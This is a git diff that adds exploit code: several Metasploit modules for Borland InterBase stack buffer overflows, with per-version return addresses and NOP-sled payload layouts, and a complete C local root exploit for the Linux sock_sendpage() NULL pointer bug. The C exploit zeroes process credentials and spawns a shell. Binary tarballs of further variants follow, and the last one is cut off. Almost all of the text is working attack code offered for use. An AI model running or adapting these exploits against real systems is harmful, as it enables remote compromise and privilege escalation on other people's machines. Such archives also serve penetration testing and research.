+ + def exploit_target(target) + + target['Length'].each do |length| + + connect + + # Attach database + op_attach = 19 + + remainder = length.remainder(4) + padding = 0 + + if remainder > 0 + padding = (4 - remainder) + end + + buf = '' + + # Operation/packet type + buf << [op_attach].pack('N') + + # Id + buf << [0].pack('N') + + # Length + buf << [length].pack('N') + + # Nop block + buf << make_nops(length - payload.encoded.length - 13) + + # Payload + buf << payload.encoded + + # Jump back into the nop block + buf << "\xe9" + [-1028].pack('V') + + # Jump back + buf << "\xeb" + [-7].pack('c') + + # Random alpha data + buf << rand_text_alpha(2) + + # Target + buf << [target.ret].pack('V') + + # Padding + buf << "\x00" * padding + + # Database parameter block + + # Length + buf << [1024].pack('N') + + # Random alpha data + buf << rand_text_alpha(1024) + + sock.put(buf) + + select(nil,nil,nil,4) + + handler + + end + + end +end diff --git a/ib_isc_create_database.rb b/ib_isc_create_database.rb new file mode 100644 index 0000000..097ff84 --- /dev/null +++ b/ib_isc_create_database.rb @@ -0,0 +1,173 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::BruteTargets + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Borland InterBase isc_create_database() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Borland InterBase + by sending a specially crafted create request. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38606' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x2f\x3a\x40\x5c", + 'StackAdjustment' => -3500, + }, + 'Targets' => + [ + [ 'Brute Force', { } ], + # 0x00403d4b pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V8.1.0.257', + { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4b } + ], + # 0x00403d4d pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V8.0.0.123', + { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4d } + ], + # 0x00403a5d pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80', + { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403a5d } + ], + # 0x004038fd pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V7.0.1.1', + { 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038fd } + ], + # 0x0040390d pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V6.5.0.28', + { 'Length' => [ 1332, 1336 ], 'Ret' => 0x0040390d } + ], + # 0x00403901 pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V6.0.1.6', + { 'Length' => [ 1332, 1336 ], 'Ret' => 0x00403901 } + ], + # 0x004038b1 pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0', + { 'Length' => [ 1332, 1336 ], 'Ret' => 0x004038b1 } + ], + # 0x00404a10 pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V5.5.0.742', + { 'Length' => [ 1432, 1436 ], 'Ret' => 0x00404a10 } + ], + # 0x00404a0e pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V5.1.1.680', + { 'Length' => [ 1336, 1340 ], 'Ret' => 0x00404a0e } + ], + # Debug + [ + 'Debug', + { 'Length' => [ 1336 ], 'Ret' => 0xaabbccdd } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2007-10-03' + )) + + register_options( + [ + Opt::RPORT(3050) + ], + self.class + ) + + end + + def exploit_target(target) + + target['Length'].each do |length| + + connect + + # Create database + op_create = 20 + + remainder = length.remainder(4) + padding = 0 + + if remainder > 0 + padding = (4 - remainder) + end + + buf = '' + + # Operation/packet type + buf << [op_create].pack('N') + + # Id + buf << [0].pack('N') + + # Length + buf << [length].pack('N') + + # Nop block + buf << make_nops(length - payload.encoded.length - 13) + + # Payload + buf << payload.encoded + + # Jump back into the nop block + buf << "\xe9" + [-1028].pack('V') + + # Jump back + buf << "\xeb" + [-7].pack('c') + + # Random alpha data + buf << rand_text_alpha(2) + + # Target + buf << [target.ret].pack('V') + + # Padding + buf << "\x00" * padding + + # Database parameter block + + # Length + buf << [1024].pack('N') + + # Random alpha data + buf << rand_text_alpha(1024) + + sock.put(buf) + + select(nil,nil,nil,4) + + handler + + end + + end +end diff --git a/ib_jrd8_create_database.rb b/ib_jrd8_create_database.rb new file mode 100644 index 0000000..9ce17f7 --- /dev/null +++ b/ib_jrd8_create_database.rb @@ -0,0 +1,111 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Borland InterBase jrd8_create_database() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Borland InterBase + by sending a specially crafted create request. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'References' => + [ + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38606' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 128, + 'BadChars' => "\x00\x2f\x3a\x40\x5c", + }, + 'Targets' => + [ + # 0x0804cbe4 pop esi; pop ebp; ret + [ + 'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253', + { 'Ret' => 0x0804cbe4 } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2007-10-03' + )) + + register_options( + [ + Opt::RPORT(3050) + ], + self.class + ) + + end + + def exploit + + connect + + # Create database + op_create = 20 + + length = 544 + remainder = length.remainder(4) + padding = 0 + + if remainder > 0 + padding = (4 - remainder) + end + + buf = '' + + # Operation/packet type + buf << [op_create].pack('N') + + # Id + buf << [0].pack('N') + + # Length + buf << [length].pack('N') + + # It will return into this nop block + buf << make_nops(length - payload.encoded.length - 4) + + # Payload + buf << payload.encoded + + # Target + buf << [target.ret].pack('V') + + # Padding + buf << "\x00" * padding + + # Database parameter block + + # Length + buf << [1024 * 32].pack('N') + + # Random alpha data + buf << rand_text_alpha(1024 * 32) + + sock.put(buf) + + handler + + end +end diff --git a/ib_open_marker_file.rb b/ib_open_marker_file.rb new file mode 100644 index 0000000..4c9ee00 --- /dev/null +++ b/ib_open_marker_file.rb @@ -0,0 +1,111 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Borland InterBase open_marker_file() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Borland InterBase + by sending a specially crafted attach request. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'References' => + [ + [ 'CVE', '2007-5244' ], + [ 'OSVDB', '38610' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x2f\x3a\x40\x5c", + }, + 'Targets' => + [ + # 0x0804cbe4 pop esi; pop ebp; ret + [ + 'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253', + { 'Ret' => 0x0804cbe4 } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2007-10-03' + )) + + register_options( + [ + Opt::RPORT(3050) + ], + self.class + ) + + end + + def exploit + + connect + + # Attach database + op_attach = 19 + + length = 1056 + remainder = length.remainder(4) + padding = 0 + + if remainder > 0 + padding = (4 - remainder) + end + + buf = '' + + # Operation/packet type + buf << [op_attach].pack('N') + + # Id + buf << [0].pack('N') + + # Length + buf << [length].pack('N') + + # It will return into this nop block + buf << make_nops(length - payload.encoded.length - 4) + + # Payload + buf << payload.encoded + + # Target + buf << [target.ret].pack('V') + + # Padding + buf << "\x00" * padding + + # Database parameter block + + # Length + buf << [1024].pack('N') + + # Random alpha data + buf << rand_text_alpha(1024) + + sock.put(buf) + + handler + + end +end diff --git a/ib_pwd_db_aliased.rb b/ib_pwd_db_aliased.rb new file mode 100644 index 0000000..142ef5e --- /dev/null +++ b/ib_pwd_db_aliased.rb @@ -0,0 +1,109 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Borland InterBase PWD_db_aliased() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Borland InterBase + by sending a specially crafted attach request. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'References' => + [ + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38607' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x2f\x3a\x40\x5c", + }, + 'Targets' => + [ + # 0x0804cbe4 pop esi; pop ebp; ret + [ + 'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253', + { 'Ret' => 0x0804cbe4 } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2007-10-03' + )) + + register_options( + [ + Opt::RPORT(3050) + ], + self.class + ) + + end + + def exploit + + connect + + # Attach database + op_attach = 19 + + length = 1152 + remainder = length.remainder(4) + padding = 0 + + if remainder > 0 + padding = (4 - remainder) + end + + buf = '' + + # Operation/packet type + buf << [op_attach].pack('N') + + # Id + buf << [0].pack('N') + + # Length + buf << [length].pack('N') + + # It will return into this nop block + buf << make_nops(length - payload.encoded.length - 4) + + # Payload + buf << payload.encoded + + # Target + buf << [target.ret].pack('V') + + # Padding + buf << "\x00" * padding + + # Length + buf << [1024].pack('N') + + # Random alpha data + buf << rand_text_alpha(1024) + + sock.put(buf) + + handler + + end +end diff --git a/ib_svc_attach.rb b/ib_svc_attach.rb new file mode 100644 index 0000000..4680f55 --- /dev/null +++ b/ib_svc_attach.rb @@ -0,0 +1,173 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::Remote::BruteTargets + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Borland InterBase SVC_attach() Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in Borland InterBase + by sending a specially crafted service attach request. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'win', + 'References' => + [ + [ 'CVE', '2007-5243' ], + [ 'OSVDB', '38605' ], + [ 'BID', '25917' ], + [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 512, + 'BadChars' => "\x00\x2f\x3a\x40\x5c", + 'StackAdjustment' => -3500, + }, + 'Targets' => + [ + [ 'Brute Force', { } ], + # 0x00403d4b pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V8.1.0.257', + { 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4b } + ], + # 0x00403d4d pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V8.0.0.123', + { 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4d } + ], + # 0x00403a5d pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80', + { 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403a5d } + ], + # 0x004038fd pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V7.0.1.1', + { 'Length' => [ 3660, 3664 ], 'Ret' => 0x004038fd } + ], + # 0x0040390d pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V6.5.0.28', + { 'Length' => [ 2116, 2120], 'Ret' => 0x0040390d } + ], + # 0x00403901 pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V6.0.1.6', + { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403901 } + ], + # 0x004038b1 pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0', + { 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038b1 } + ], + # 0x00404a10 pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V5.5.0.742', + { 'Length' => [ 2216, 2120 ], 'Ret' => 0x00404a10 } + ], + # 0x00404a0e pop esi; pop ebp; ret + [ + 'Borland InterBase WI-V5.1.1.680', + { 'Length' => [ 2120, 2124 ], 'Ret' => 0x00404a0e } + ], + # Debug + [ + 'Debug', + { 'Length' => [ 2120 ], 'Ret' => 0xaabbccdd } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2007-10-03' + )) + + register_options( + [ + Opt::RPORT(3050) + ], + self.class + ) + + end + + def exploit_target(target) + + target['Length'].each do |length| + + connect + + # Service attach + op_service_attach = 82 + + remainder = length.remainder(4) + padding = 0 + + if remainder > 0 + padding = (4 - remainder) + end + + buf = '' + + # Operation/packet type + buf << [op_service_attach].pack('N') + + # Id + buf << [0].pack('N') + + # Length + buf << [length].pack('N') + + # Nop block + buf << make_nops(length - payload.encoded.length - 13) + + # Payload + buf << payload.encoded + + # Jump back into the nop block + buf << "\xe9" + [-1028].pack('V') + + # Jump back + buf << "\xeb" + [-7].pack('c') + + # Random alpha data + buf << rand_text_alpha(2) + + # Target + buf << [target.ret].pack('V') + + # Padding + buf << "\x00" * padding + + # Database parameter block + + # Length + buf << [1024].pack('N') + + # Random alpha data + buf << rand_text_alpha(1024) + + sock.put(buf) + + select(nil,nil,nil,4) + + handler + + end + + end +end diff --git a/linux-sendpage.c b/linux-sendpage.c new file mode 100644 index 0000000..7cda0d3 --- /dev/null +++ b/linux-sendpage.c @@ -0,0 +1,374 @@ +/* + * Linux sock_sendpage() NULL pointer dereference + * Copyright 2009 Ramon de Carvalho Valle + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + * + */ + +/* + * This exploit was written to illustrate the exploitability of this + * vulnerability[1], discovered by Tavis Ormandy and Julien Tinnes, on ppc + * and ppc64. + * + * This exploit makes use of the SELinux and the mmap_min_addr problem to + * exploit this vulnerability on Red Hat Enterprise Linux 5.3 and CentOS 5.3. + * The problem, first noticed by Brad Spengler, was described by Red Hat in + * Red Hat Knowledgebase article: Security-Enhanced Linux (SELinux) policy and + * the mmap_min_addr protection[2]. + * + * Support for i386 and x86_64 was added for completeness. For a more complete + * implementation, refer to Brad Spengler's exploit[3], which also implements + * the personality trick[4] published by Tavis Ormandy and Julien Tinnes. + * + * Linux kernel versions from 2.4.4 to 2.4.37.4, and from 2.6.0 to 2.6.30.4 + * are vulnerable. + * + * This exploit was tested on: + * + * CentOS 5.3 (2.6.18-128.7.1.el5) is not vulnerable + * CentOS 5.3 (2.6.18-128.4.1.el5) + * CentOS 5.3 (2.6.18-128.2.1.el5) + * CentOS 5.3 (2.6.18-128.1.16.el5) + * CentOS 5.3 (2.6.18-128.1.14.el5) + * CentOS 5.3 (2.6.18-128.1.10.el5) + * CentOS 5.3 (2.6.18-128.1.6.el5) + * CentOS 5.3 (2.6.18-128.1.1.el5) + * CentOS 5.3 (2.6.18-128.el5) + * CentOS 4.8 (2.6.9-89.0.9.EL) is not vulnerable + * CentOS 4.8 (2.6.9-89.0.7.EL) + * CentOS 4.8 (2.6.9-89.0.3.EL) + * CentOS 4.8 (2.6.9-89.EL) + * Red Hat Enterprise Linux 5.3 (2.6.18-128.7.1.el5) is not vulnerable + * Red Hat Enterprise Linux 5.3 (2.6.18-128.4.1.el5) + * Red Hat Enterprise Linux 5.3 (2.6.18-128.2.1.el5) + * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.16.el5) + * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.14.el5) + * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.10.el5) + * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.6.el5) + * Red Hat Enterprise Linux 5.3 (2.6.18-128.1.1.el5) + * Red Hat Enterprise Linux 5.3 (2.6.18-128.el5) + * Red Hat Enterprise Linux 4.8 (2.6.9-89.0.9.EL) is not vulnerable + * Red Hat Enterprise Linux 4.8 (2.6.9-89.0.7.EL) + * Red Hat Enterprise Linux 4.8 (2.6.9-89.0.3.EL) + * Red Hat Enterprise Linux 4.8 (2.6.9-89.EL) + * SUSE Linux Enterprise Server 11 (2.6.27.19-5) + * SUSE Linux Enterprise Server 10 SP2 (2.6.16.60-0.21) + * Ubuntu 8.10 (2.6.27-14) is not vulnerable + * Ubuntu 8.10 (2.6.27-11) + * Ubuntu 8.10 (2.6.27-9) + * Ubuntu 8.10 (2.6.27-7) + * + * For i386 and ppc, compile with the following command: + * gcc -Wall -o linux-sendpage linux-sendpage.c + * + * And for x86_64 and ppc64: + * gcc -Wall -m64 -o linux-sendpage linux-sendpage.c + * + * [1] http://blog.cr0.org/2009/08/linux-null-pointer-dereference-due-to.html + * [2] http://kbase.redhat.com/faq/docs/DOC-18042 + * [3] http://www.grsecurity.net/~spender/wunderbar_emporium2.tgz + * [4] http://blog.cr0.org/2009/06/bypassing-linux-null-pointer.html + */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#if !defined(__always_inline) +#define __always_inline inline __attribute__((always_inline)) +#endif + +#if defined(__i386__) || defined(__x86_64__) +#if defined(__LP64__) +static __always_inline unsigned long +current_stack_pointer(void) +{ + unsigned long sp; + + asm volatile ("movq %%rsp,%0; " : "=r" (sp)); + + return sp; +} + +#else +static __always_inline unsigned long +current_stack_pointer(void) +{ + unsigned long sp; + + asm volatile ("movl %%esp,%0" : "=r" (sp)); + + return sp; +} + +#endif + +#elif defined(__powerpc__) || defined(__powerpc64__) +static __always_inline unsigned long +current_stack_pointer(void) +{ + unsigned long sp; + + asm volatile ("mr %0,%%r1; " : "=r" (sp)); + + return sp; +} + +#endif + +#if defined(__i386__) || defined(__x86_64__) +#if defined(__LP64__) +static __always_inline unsigned long +current_task_struct(void) +{ + unsigned long task_struct; + + asm volatile ("movq %%gs:(0),%0; " : "=r" (task_struct)); + + return task_struct; +} + +#else +#define TASK_RUNNING 0 + +static __always_inline unsigned long +current_task_struct(void) +{ + unsigned long task_struct, thread_info; + + thread_info = current_stack_pointer() & ~(4096 - 1); + + if (*(unsigned long *)thread_info >= 0xc0000000) { + task_struct = *(unsigned long *)thread_info; + + /* + * The TASK_RUNNING is the only possible state for a process executing + * in user-space. + */ + if (*(unsigned long *)task_struct == TASK_RUNNING) + return task_struct; + } + + /* + * Prior to the 2.6 kernel series, the task_struct was stored at the end + * of the kernel stack. + */ + task_struct = current_stack_pointer() & ~(8192 - 1); + + if (*(unsigned long *)task_struct == TASK_RUNNING) + return task_struct; + + thread_info = task_struct; + + task_struct = *(unsigned long *)thread_info; + + if (*(unsigned long *)task_struct == TASK_RUNNING) + return task_struct; + + return -1; +} + +#endif + +#elif defined(__powerpc__) || defined(__powerpc64__) +#define TASK_RUNNING 0 + +static __always_inline unsigned long +current_task_struct(void) +{ + unsigned long task_struct, thread_info; + +#if defined(__LP64__) + task_struct = current_stack_pointer() & ~(16384 - 1); + +#else + task_struct = current_stack_pointer() & ~(8192 - 1); + +#endif + + if (*(unsigned long *)task_struct == TASK_RUNNING) + return task_struct; + + thread_info = task_struct; + + task_struct = *(unsigned long *)thread_info; + + if (*(unsigned long *)task_struct == TASK_RUNNING) + return task_struct; + + return -1; +} + +#endif + +#if defined(__i386__) || defined(__x86_64__) +static unsigned long uid, gid; + +static int +change_cred(void) +{ + unsigned int *task_struct; + + task_struct = (unsigned int *)current_task_struct(); + + while (task_struct) { + if (task_struct[0] == uid && task_struct[1] == uid && + task_struct[2] == uid && task_struct[3] == uid && + task_struct[4] == gid && task_struct[5] == gid && + task_struct[6] == gid && task_struct[7] == gid) { + task_struct[0] = task_struct[1] = + task_struct[2] = task_struct[3] = + task_struct[4] = task_struct[5] = + task_struct[6] = task_struct[7] = 0; + break; + } + + task_struct++; + } + + return -1; +} + +#elif defined(__powerpc__) || defined(__powerpc64__) +static int +change_cred(void) +{ + unsigned int *task_struct; + + task_struct = (unsigned int *)current_task_struct(); + + while (task_struct) { + if (!task_struct[0]) { + task_struct++; + continue; + } + + if (task_struct[0] == task_struct[1] && + task_struct[0] == task_struct[2] && + task_struct[0] == task_struct[3] && + task_struct[4] == task_struct[5] && + task_struct[4] == task_struct[6] && + task_struct[4] == task_struct[7]) { + task_struct[0] = task_struct[1] = + task_struct[2] = task_struct[3] = + task_struct[4] = task_struct[5] = + task_struct[6] = task_struct[7] = 0; + break; + } + + task_struct++; + } + + return -1; +} + +#endif + +#define PAGE_SIZE getpagesize() + +int +main(void) +{ + char *addr; + int out_fd, in_fd; + char template[] = "/tmp/tmp.XXXXXX"; + +#if defined(__i386__) || defined(__x86_64__) + uid = getuid(), gid = getgid(); + +#endif + + if ((addr = mmap(NULL, 0x1000, PROT_EXEC|PROT_READ|PROT_WRITE, MAP_FIXED| + MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)) == MAP_FAILED) { + perror("mmap"); + exit(EXIT_FAILURE); + } + +#if defined(__i386__) || defined(__x86_64__) +#if defined(__LP64__) + addr[0] = '\xff'; + addr[1] = '\x24'; + addr[2] = '\x25'; + *(unsigned long *)&addr[3] = 8; + *(unsigned long *)&addr[8] = (unsigned long)change_cred; + +#else + addr[0] = '\xff'; + addr[1] = '\x25'; + *(unsigned long *)&addr[2] = 8; + *(unsigned long *)&addr[8] = (unsigned long)change_cred; + +#endif + +#elif defined(__powerpc__) || defined(__powerpc64__) +#if defined(__LP64__) + /* + * The use of function descriptors by the Power 64-bit ELF ABI requires + * the use of a fake function descriptor. + */ + *(unsigned long *)&addr[0] = *(unsigned long *)change_cred; + +#else + addr[0] = '\x3f'; + addr[1] = '\xe0'; + *(unsigned short *)&addr[2] = (unsigned short)change_cred>>16; + addr[4] = '\x63'; + addr[5] = '\xff'; + *(unsigned short *)&addr[6] = (unsigned short)change_cred; + addr[8] = '\x7f'; + addr[9] = '\xe9'; + addr[10] = '\x03'; + addr[11] = '\xa6'; + addr[12] = '\x4e'; + addr[13] = '\x80'; + addr[14] = '\x04'; + addr[15] = '\x20'; + +#endif + +#endif + + if ((out_fd = socket(PF_BLUETOOTH, SOCK_DGRAM, 0)) == -1) { + perror("socket"); + exit(EXIT_FAILURE); + } + + if ((in_fd = mkstemp(template)) == -1) { + perror("mkstemp"); + exit(EXIT_FAILURE); + } + + if(unlink(template) == -1) { + perror("unlink"); + exit(EXIT_FAILURE); + } + + if (ftruncate(in_fd, PAGE_SIZE) == -1) { + perror("ftruncate"); + exit(EXIT_FAILURE); + } + + sendfile(out_fd, in_fd, NULL, PAGE_SIZE); + + execl("/bin/sh", "sh", "-i", NULL); + + exit(EXIT_SUCCESS); +} diff --git a/linux-sendpage2.tar.gz b/linux-sendpage2.tar.gz new file mode 100644 index 0000000000000000000000000000000000000000..79b20691f329a242db838cf9d58b2631a20995a1 GIT binary patch literal 3420 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 literal 0 HcmV?d00001 diff --git a/linux-sendpage3.tar.gz b/linux-sendpage3.tar.gz new file mode 100644 index 0000000000000000000000000000000000000000..ae1cc96c87d8c9c66df69cb6875e2237d4ea4f51 GIT binary patch literal 3871 